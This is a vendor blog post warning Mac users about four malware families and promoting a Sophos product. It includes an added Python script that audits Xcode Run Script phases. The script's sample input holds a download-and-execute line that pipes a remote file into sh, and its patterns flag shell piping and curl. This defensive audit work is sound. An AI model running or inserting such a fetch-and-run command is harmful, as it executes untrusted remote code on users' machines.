Macs Under Threat – Four Mac Malware Variants to Watch Out For

November 27th, 2020

“Macs are safe from malware attacks.”
“Macs are immune to malware threats.”
“What? A malware attack? You must be kidding! My Mac’s super safe.”
“Really? Macs aren’t immune to a virus attack?”

Yes, most Mac users believe, and wrongly so, that their operating system is invulnerable to a malware attack. The reality is that Macs aren’t as invulnerable as so many believe. As a Mac user, it’s wise to take necessary security precautions so as to not fall prey to misplaced optimism.

The “myth” about Mac impenetrability

There was a time in the not too distant past when ‘threats per endpoint’ for Windows outpaced those for Mac. Macs are considered safer because of the tight control Apple traditionally exercises over their hardware, and that control has an impact on data privacy. Also, there is a range of built-in tools that help keep malware at bay in Macs. So, is the confidence about Mac’s ability to protect against all malware justified?


No. That’s the straight answer. The threats against your Mac are increasing day by day. Malware is constantly evolving, and couple that with an ever-increasing attack surface as Macs grow more common and you have a scenario where even the best security can be breached.

In fact, more and more reports are showing irrefutable evidence that Mac threats have surged ahead of Windows.

Read on to get the lowdown on a few ransomware variants that are attacking Mac systems with gusto.

Mac ransomware variants

1. XCSSET – A trojan that plays hide and seek

The XCSSET trojan means business.

If you are a Mac developer and use Xcode to build apps for Mac, you must keep an eye out for this trojan. It hides deep within an Xcode project to infect it. The trojan then runs malicious code, which installs XCSSET on your system. This begins its process of systematically creating havoc by taking charge of the user’s browser and accessing sensitive personal data, including financial information, saved account passwords, and all manner of saved payment information.

We know the question you will be asking: I’m not a developer and this trojan targets developers, so why should I be concerned? The issue is that there might come a day when you download an open source app that is distributed as a buildable Xcode project. If this project is infected, your system gets infected too.
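One place a buildable Xcode project can carry commands that run on your machine is its Run Script build phases, which Xcode stores in the project's `project.pbxproj` file. The following is an added example (not part of the original article or any vendor tooling) that lists those phases so they can be read before building a downloaded project; the sample input is constructed, and the review hints are generic assumptions, not signatures of XCSSET or any other malware family.

```python
import re

# Constructed project.pbxproj fragment (sample input, not from a real project).
SAMPLE_PBXPROJ = r'''
/* Begin PBXShellScriptBuildPhase section */
    AA0000000000000000000001 /* Lint */ = {
        shellPath = /bin/sh;
        shellScript = "swiftlint --quiet\n";
    };
    AA0000000000000000000002 /* Run Script */ = {
        shellPath = /bin/sh;
        shellScript = "curl -s https://example.invalid/a | sh\n";
    };
/* End PBXShellScriptBuildPhase section */
'''

SECTION = re.compile(r"/\* Begin PBXShellScriptBuildPhase section \*/(.*?)"
                     r"/\* End PBXShellScriptBuildPhase section \*/", re.S)
START = re.compile(r"^\s*([0-9A-F]+) /\* (.*?) \*/ = \{", re.M)  # object id and name
SCRIPT = re.compile(r'shellScript = "((?:[^"\\]|\\.)*)";', re.S)
SHELL = re.compile(r"shellPath = (\S+?);")

# Generic review hints (assumptions for this example, not malware signatures).
HINTS = {
    "downloads content": re.compile(r"\b(curl|wget)\b"),
    "pipes into a shell": re.compile(r"\|\s*(ba|z)?sh\b"),
    "decodes base64": re.compile(r"\bbase64\b"),
}

def unescape(s):
    # pbxproj strings backslash-escape newlines, tabs, quotes and backslashes.
    return re.sub(r"\\(.)", lambda m: {"n": "\n", "t": "\t"}.get(m.group(1), m.group(1)), s, flags=re.S)

def script_phases(pbxproj_text):
    """Return each Run Script build phase with its shell, script body and review hints."""
    phases = []
    for section in SECTION.findall(pbxproj_text):
        starts = list(START.finditer(section))
        for i, m in enumerate(starts):
            end = starts[i + 1].start() if i + 1 < len(starts) else len(section)
            body = section[m.end():end]
            script, shell = SCRIPT.search(body), SHELL.search(body)
            text = unescape(script.group(1)) if script else ""
            phases.append({"id": m.group(1), "name": m.group(2), "shell": shell.group(1) if shell else "",
                           "script": text, "hints": [h for h, rx in HINTS.items() if rx.search(text)]})
    return phases

if __name__ == "__main__":
    for p in script_phases(SAMPLE_PBXPROJ):
        print(p["name"], p["shell"], p["hints"] or "no hints", repr(p["script"]))
```

A phase with no hints still deserves a read: the point is to see every script the build would execute, not to rely on the pattern list.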

2. ThiefQuest or EvilQuest – the name says it all

This ransomware targeting Macs is as sinister as they come. Apart from having true blue ransomware capabilities, it goes further down the rabbit hole and acts as a spyware. This malware not only steals files, but also hunts for passwords and data relating to cryptocurrency wallets.

If that’s not enough, it also runs an extremely capable keylogger that will record your keystrokes as you type, stealing passwords and financial information. You blissfully enter your credit card numbers and more, completely unaware that your information is being recorded. An even more insidious component: it lurks patiently in the infected computer even after a reboot, to launch the second stage of the attack as needed. It doesn’t allow you to rest easy.

Its ransomware attack is not just a sucker punch. It has the ability to keep on punching until the attacker has drained all information out of your system.

3. NukeSpeed – Do You Smell a RAT?

This malware is a remote access trojan (RAT), and investigations have linked it to North Korea. It uses encryption tactics that make it difficult to analyze and takes actions to hide itself. It also infects the computer by installing as a service, or by inserting itself in the Run registry key. Once your computer is infected, it provides control of your system to the attackers. You will likely not even be aware of the change, but once it starts its nefarious play within your system, it will start creating processes as another user, stop processes, read/write/remove files… and it’s just getting started.

4. GravityRAT – Now on Macs!

No, that’s not an advertisement. This one has earned widespread notoriety for infecting Windows PCs, but is now attacking Macs as well. Like all other RATs, this one also poses as a legitimate app, and once it accesses your system, it proceeds to provide remote access to the attacker. It’s among the pantheon of the ‘worst of the worst’ because it’s been used against military targets as well as home machines. It delivers system information to the attacker, searches files based on a range of file extensions, takes screenshots, records audio, and basically does everything that is expected from a spyware. It uses stolen developer signatures to bypass Apple’s strict security protocols that ensure only legitimate apps are made available to Mac users.

Malware protection an absolute must on your Macs

With the popularity of Macs growing every day, those devices are now in hackers’ crosshairs. The threat always existed, but is much more prevalent now. As malware becomes more sophisticated, you need advanced malware protection to keep up.

One thing is for certain: Mac users need a cybersecurity solution.

That solution should offer comprehensive protection specifically configured for Macs. Sophos Home Premium for Macs is the ideal security solution with its award-winning antivirus, powerful ransomware protection and a range of advanced techniques that will keep complex threats away.

Be sure to keep your Mac protected from advanced malware at all times.
